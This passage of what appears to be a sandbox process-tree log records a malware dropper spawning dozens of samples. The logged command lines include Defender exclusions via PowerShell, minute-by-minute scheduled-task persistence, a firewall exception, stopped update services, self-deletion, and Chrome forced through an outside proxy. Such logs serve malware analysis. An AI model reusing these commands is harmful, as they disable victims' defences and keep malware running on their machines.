    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:2984
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:2316
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:1760
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:3852
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:2920
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:3840
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:3968
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:5292
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:4996
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:4000
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:3192
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:3816
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:3736
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:3676
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:5060
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:4072
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:1968
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:1392
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:3872
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:4312
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:2636
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:864
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:4680
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:2724
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:1076
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:1308
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:588
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:5128
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\DISCOR~1.EXE"
    3⤵
    PID:6468
  - - C:\Users\Admin\AppData\Local\Temp\Files\DISCOR~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\DISCOR~1.EXE
      4⤵
      PID:6340
    - - C:\Users\Admin\AppData\Local\Temp\Files\DISCOR~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\Files\DISCOR~1.EXE
        5⤵
        
        PID:3564
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE"
    3⤵
    PID:2924
  - - C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE
      4⤵
      PID:6048
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DB13.tmp\DB14.tmp\DB15.bat C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE"
        5⤵
        
        PID:5784
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\sysnative\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\DB13.tmp\DB14.tmp\DB15.bat C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE
        6⤵
        
        PID:5664
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\uctgkfb7.exe"
    3⤵
    PID:7104
  - - C:\Users\Admin\AppData\Local\Temp\Files\uctgkfb7.exe
      C:\Users\Admin\AppData\Local\Temp\Files\uctgkfb7.exe
      4⤵
      PID:7008
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows" /tr "C:\Users\Admin\Windows.exe"
        5⤵
        
        PID:5288
      - C:\Windows\SysWOW64\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn Windows /tr C:\Users\Admin\Windows.exe
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4108
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\setup.exe"
    3⤵
    PID:3020
  - - C:\Users\Admin\AppData\Local\Temp\Files\setup.exe
      C:\Users\Admin\AppData\Local\Temp\Files\setup.exe
      4⤵
      PID:6528
    - - C:\Users\Admin\AppData\Local\Temp\is-TDNG9.tmp\setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-TDNG9.tmp\setup.tmp" /SL5="$2034A,46398608,813568,C:\Users\Admin\AppData\Local\Temp\Files\setup.exe"
        5⤵
        
        PID:5476
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\COMPLE~1.EXE"
    3⤵
    PID:2676
  - - C:\Users\Admin\AppData\Local\Temp\Files\COMPLE~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\COMPLE~1.EXE
      4⤵
      PID:2280
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:2940
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\dsds.exe"
    3⤵
    PID:3652
  - - C:\Users\Admin\AppData\Local\Temp\Files\dsds.exe
      C:\Users\Admin\AppData\Local\Temp\Files\dsds.exe
      4⤵
      PID:8364
    - - C:\Users\Admin\AppData\Local\Temp\Files\dsds.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\dsds.exe"
        5⤵
        
        PID:7884
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"
    3⤵
    PID:912
  - - C:\Users\Admin\AppData\Local\Temp\Files\bin.exe
      C:\Users\Admin\AppData\Local\Temp\Files\bin.exe
      4⤵
      PID:8256
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\STEAMU~1.EXE"
    3⤵
    PID:3828
  - - C:\Users\Admin\AppData\Local\Temp\Files\STEAMU~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\STEAMU~1.EXE
      4⤵
      PID:6504
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\LGENDP~1.EXE"
    3⤵
    PID:4728
  - - C:\Users\Admin\AppData\Local\Temp\Files\LGENDP~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\LGENDP~1.EXE
      4⤵
      PID:764
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\CnyvVl.exe"
    3⤵
    PID:4988
  - - C:\Users\Admin\AppData\Local\Temp\Files\CnyvVl.exe
      C:\Users\Admin\AppData\Local\Temp\Files\CnyvVl.exe
      4⤵
      PID:6120
- - C:\Windows\SysWOW64\netbtugc.exe
    "C:\Windows\SysWOW64\netbtugc.exe"
    3⤵
    PID:7428
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\worker.exe"
    3⤵
    PID:7720
  - - C:\Users\Admin\AppData\Local\Temp\Files\worker.exe
      C:\Users\Admin\AppData\Local\Temp\Files\worker.exe
      4⤵
      PID:7856
    - - C:\Users\Admin\AppData\Local\Temp\Files\worker.exe
        
        C:\Users\Admin\AppData\Local\Temp\Files\worker.exe
        5⤵
        
        PID:1480
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\666.exe"
    3⤵
    PID:936
  - - C:\Users\Admin\AppData\Local\Temp\Files\666.exe
      C:\Users\Admin\AppData\Local\Temp\Files\666.exe
      4⤵
      PID:7400
- C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  2⤵
  PID:2716
- - C:\Users\Admin\AppData\Local\Temp\Files\DecryptJohn.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\DecryptJohn.exe"
    3⤵
    PID:5196
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
    3⤵
    PID:3204
  - - C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
      C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
      4⤵
      PID:2512
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'
        5⤵
        
        PID:4736
      - C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3148
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        5⤵
        
        PID:5412
      - C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6052
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
        5⤵
        
        PID:2824
      - C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5204
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        5⤵
        
        PID:2372
      - C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4924
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
        5⤵
        
        PID:3592
      - C:\Windows\SysWOW64\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn svchost /tr C:\Users\Admin\AppData\Roaming\svchost.exe
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3368
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\creal.exe"
    3⤵
    PID:6684
  - - C:\Users\Admin\AppData\Local\Temp\Files\creal.exe
      C:\Users\Admin\AppData\Local\Temp\Files\creal.exe
      4⤵
      PID:6788
    - - C:\Users\Admin\AppData\Local\Temp\Files\creal.exe
        
        C:\Users\Admin\AppData\Local\Temp\Files\creal.exe
        5⤵
        
        PID:6128
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\shopfree.exe"
    3⤵
    PID:6800
  - - C:\Users\Admin\AppData\Local\Temp\Files\shopfree.exe
      C:\Users\Admin\AppData\Local\Temp\Files\shopfree.exe
      4⤵
      PID:3272
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\build.exe"
    3⤵
    PID:3880
  - - C:\Users\Admin\AppData\Local\Temp\Files\build.exe
      C:\Users\Admin\AppData\Local\Temp\Files\build.exe
      4⤵
      PID:6024
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\build.exe" & rd /s /q "C:\ProgramData\BAAFIJKKEHJD" & exit
        5⤵
        
        PID:8708
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c timeout /t 10 & del /f /q C:\Users\Admin\AppData\Local\Temp\Files\build.exe & rd /s /q C:\ProgramData\BAAFIJKKEHJD & exit
        6⤵
        
        PID:9012
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        7⤵
        Delays execution with timeout.exe
        
        PID:7964
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\444.exe"
    3⤵
    PID:4736
  - - C:\Users\Admin\AppData\Local\Temp\Files\444.exe
      C:\Users\Admin\AppData\Local\Temp\Files\444.exe
      4⤵
      PID:3908
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\conhost.exe"
        5⤵
        
        PID:1492
      - C:\Users\Admin\AppData\Roaming\conhost.exe
        
        C:\Users\Admin\AppData\Roaming\conhost.exe
        6⤵
        
        PID:3580
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\conhost.exe" "conhost.exe" ENABLE
        7⤵
        Modifies Windows Firewall
        
        PID:3024
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\EAKLAU~1.EXE"
    3⤵
    PID:6744
  - - C:\Users\Admin\AppData\Local\Temp\Files\EAKLAU~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\EAKLAU~1.EXE
      4⤵
      PID:1100
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://discord.gg/rsM4AgvAhn
        5⤵
        
        PID:4868
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4868 CREDAT:275457 /prefetch:2
        6⤵
        
        PID:7620
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\clip.exe"
    3⤵
    PID:4500
  - - C:\Users\Admin\AppData\Local\Temp\Files\clip.exe
      C:\Users\Admin\AppData\Local\Temp\Files\clip.exe
      4⤵
      PID:4332
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\o.exe"
    3⤵
    PID:568
  - - C:\Users\Admin\AppData\Local\Temp\Files\o.exe
      C:\Users\Admin\AppData\Local\Temp\Files\o.exe
      4⤵
      PID:3764
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe"
    3⤵
    PID:2020
  - - C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe
      C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe
      4⤵
      PID:4408
    - - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1972
    - - C:\Users\Admin\AppData\Roaming\svhost\svhost.exe
        
        "C:\Users\Admin\AppData\Roaming\svhost\svhost.exe"
        5⤵
        
        PID:4516
      - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\svhost\svhost.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3836
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\Journal.exe"
    3⤵
    PID:2420
  - - C:\Users\Admin\AppData\Local\Temp\Files\Journal.exe
      C:\Users\Admin\AppData\Local\Temp\Files\Journal.exe
      4⤵
      PID:5448
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\Session.exe"
    3⤵
    PID:4300
  - - C:\Users\Admin\AppData\Local\Temp\Files\Session.exe
      C:\Users\Admin\AppData\Local\Temp\Files\Session.exe
      4⤵
      PID:3304
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\sjkhjkh.exe"
    3⤵
    PID:3144
  - - C:\Users\Admin\AppData\Local\Temp\Files\sjkhjkh.exe
      C:\Users\Admin\AppData\Local\Temp\Files\sjkhjkh.exe
      4⤵
      PID:6224
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\zts.exe"
    3⤵
    PID:1188
  - - C:\Users\Admin\AppData\Local\Temp\Files\zts.exe
      C:\Users\Admin\AppData\Local\Temp\Files\zts.exe
      4⤵
      PID:6376
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 168
        5⤵
        Program crash
        
        PID:4180
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\cudo.exe"
    3⤵
    PID:4732
  - - C:\Users\Admin\AppData\Local\Temp\Files\cudo.exe
      C:\Users\Admin\AppData\Local\Temp\Files\cudo.exe
      4⤵
      PID:7132
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\Rage.exe"
    3⤵
    PID:8880
  - - C:\Users\Admin\AppData\Local\Temp\Files\Rage.exe
      C:\Users\Admin\AppData\Local\Temp\Files\Rage.exe
      4⤵
      PID:9020
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\PROGRA~3\wvtynvwe\AutoIt3.exe" C:\ProgramData\wvtynvwe\clxs.a3x
        5⤵
        
        PID:4700
      - C:\PROGRA~3\wvtynvwe\AutoIt3.exe
        
        C:\PROGRA~3\wvtynvwe\AutoIt3.exe C:\ProgramData\wvtynvwe\clxs.a3x
        6⤵
        
        PID:5276
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\m.exe"
    3⤵
    PID:9152
  - - C:\Users\Admin\AppData\Local\Temp\Files\m.exe
      C:\Users\Admin\AppData\Local\Temp\Files\m.exe
      4⤵
      PID:6580
    - - C:\Windows\sysvplervcs.exe
        
        C:\Windows\sysvplervcs.exe
        5⤵
        
        PID:4860
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        
        PID:5784
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE
        7⤵
        
        PID:6172
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        6⤵
        
        PID:5700
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        7⤵
        
        PID:3516
      - C:\Users\Admin\AppData\Local\Temp\1563225940.exe
        
        C:\Users\Admin\AppData\Local\Temp\1563225940.exe
        6⤵
        
        PID:4784
      - C:\Users\Admin\AppData\Local\Temp\2253722722.exe
        
        C:\Users\Admin\AppData\Local\Temp\2253722722.exe
        6⤵
        
        PID:7572
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\GOLD.exe"
    3⤵
    PID:9204
  - - C:\Users\Admin\AppData\Local\Temp\Files\GOLD.exe
      C:\Users\Admin\AppData\Local\Temp\Files\GOLD.exe
      4⤵
      PID:5112
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 524
        5⤵
        Program crash
        
        PID:4872
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"
    3⤵
    PID:308
  - - C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe
      C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe
      4⤵
      PID:4028
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\EXTREM~2.EXE"
    3⤵
    PID:3296
  - - C:\Users\Admin\AppData\Local\Temp\Files\EXTREM~2.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\EXTREM~2.EXE
      4⤵
      PID:5088
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\request.exe"
    3⤵
    PID:1872
  - - C:\Users\Admin\AppData\Local\Temp\Files\request.exe
      C:\Users\Admin\AppData\Local\Temp\Files\request.exe
      4⤵
      PID:1568
    - - C:\Windows\SysWOW64\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN msvcservice /TR "C:\Users\Admin\msvcservice.exe" /F
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5856
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe"
    3⤵
    PID:7120
  - - C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe
      C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe
      4⤵
      PID:7176
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\Taskmgr.exe"
    3⤵
    PID:7224
  - - C:\Users\Admin\AppData\Local\Temp\Files\Taskmgr.exe
      C:\Users\Admin\AppData\Local\Temp\Files\Taskmgr.exe
      4⤵
      PID:7416
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\CVIMEL~1.EXE"
    3⤵
    PID:7320
  - - C:\Users\Admin\AppData\Local\Temp\Files\CVIMEL~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\CVIMEL~1.EXE
      4⤵
      PID:7600
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\main.exe"
    3⤵
    PID:7468
  - - C:\Users\Admin\AppData\Local\Temp\Files\main.exe
      C:\Users\Admin\AppData\Local\Temp\Files\main.exe
      4⤵
      PID:7552
    - - C:\Users\Admin\AppData\Local\Temp\Files\main.exe
        
        C:\Users\Admin\AppData\Local\Temp\Files\main.exe
        5⤵
        
        PID:688
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\Opolis.exe"
    3⤵
    PID:912
  - - C:\Users\Admin\AppData\Local\Temp\Files\Opolis.exe
      C:\Users\Admin\AppData\Local\Temp\Files\Opolis.exe
      4⤵
      PID:7344
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --proxy-server="217.65.2.14:3333"
  2⤵
  PID:900
- - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
    C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe --proxy-server="217.65.2.14:3333"
    3⤵
    PID:4292
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7feee889758,0x7feee889768,0x7feee889778
      4⤵
      PID:1048
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1136 --field-trial-handle=1360,i,14161722151807392505,18163019003393019404,131072 /prefetch:2
      4⤵
      PID:4624
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --proxy-server=217.65.2.14:3333 --mojo-platform-channel-handle=1500 --field-trial-handle=1360,i,14161722151807392505,18163019003393019404,131072 /prefetch:8
      4⤵
      PID:5884
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
